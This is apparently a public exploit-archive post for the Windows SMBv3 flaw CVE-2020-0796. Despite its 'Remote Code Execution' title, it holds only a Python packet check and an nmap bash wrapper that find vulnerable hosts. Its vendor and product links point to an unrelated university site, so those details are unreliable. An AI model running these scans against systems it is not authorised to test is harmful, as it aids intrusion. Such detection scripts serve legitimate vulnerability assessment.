Share
# Exploit Title: Windows SMBv3 Client/Server Remote Code Execution  
Vulnerability - remote  
# Author: nu11secur1ty  
# Date: 2020-03-14  
# Vendor: https://smb.wsu.edu/  
# Link:  
https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0796  
# CVE: CVE-2020-0796  
  
  
  
[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)  
[+] Website: https://www.nu11secur1ty.com/  
[+] Source: readme from GitHUB  
[+] twitter.com/nu11secur1ty  
  
  
[Exploit Program Code]  
--------------------------------------  
import socket  
import struct  
import sys  
  
smbsuckmickey_mouse =  
b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00  
\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'  
sock = socket.socket(socket.AF_INET)  
sock.settimeout(3)  
sock.connect(( sys.argv[1], 445 ))  
sock.send(smbsuckmickey_mouse)  
  
nb, = struct.unpack(">I", sock.recv(4))  
res = sock.recv(nb)  
  
if not res[68:70] == b"\x11\x03":  
exit("Not vulnerable.")  
if not res[70:72] == b"\x02\x00":  
exit("Not vulnerable.")  
  
exit("Vulnerable.")  
  
--------------------------------------  
  
#!/usr/bin/bash  
if [ $# -eq 0 ]  
then  
echo $'Usage:\n\vulnsmb.sh TARGET_IP_or_CIDR'  
exit 1  
fi  
echo "Checking if there's SMB v3.11 in" $1 "..."  
nmap -p445 --script smb-protocols -Pn -n $1 | grep -P  
'\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report  
for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP  
'\d+\.\d+\.\d+\.\d+'  
if [[ $? != 0 ]]; then  
echo "There's no SMB v3.11"  
fi  
  
-------------------------------------  
  
[Vendor]  
Microsoft  
  
  
[Product]  
https://smb.wsu.edu/  
  
  
[Vulnerability Type]  
Remote + Layer 2  
  
  
  
[Security Issue]  
The security update addresses the vulnerability by correcting how the SMBv3  
protocol handles these specially crafted requests.  
  
  
[References]  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796  
A remote code execution vulnerability exists in the way that the Microsoft  
Server Message Block 3.1.1 (SMBv3) protocol handles certain requests.  
An attacker who successfully exploited the vulnerability could gain the  
ability to execute code on the target server or client.  
To exploit the vulnerability against a server, an unauthenticated attacker  
could send a specially crafted packet to a targeted SMBv3 server.  
To exploit the vulnerability against a client, an unauthenticated attacker  
would need to configure a malicious SMBv3 server and convince a user to  
connect to it.  
The security update addresses the vulnerability by correcting how the SMBv3  
protocol handles these specially crafted requests.  
  
[Network Access]  
Remote + Layer 2  
  
  
[Disclosure Timeline]  
Published: 03/12/2020  
  
  
[+] Disclaimer  
The entry creation date may reflect when the CVE ID was allocated or  
reserved,  
and does not necessarily indicate when this vulnerability was discovered,  
shared  
with the affected vendor, publicly disclosed, or updated in CVE.  
  
--   
  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.blogspot.com/>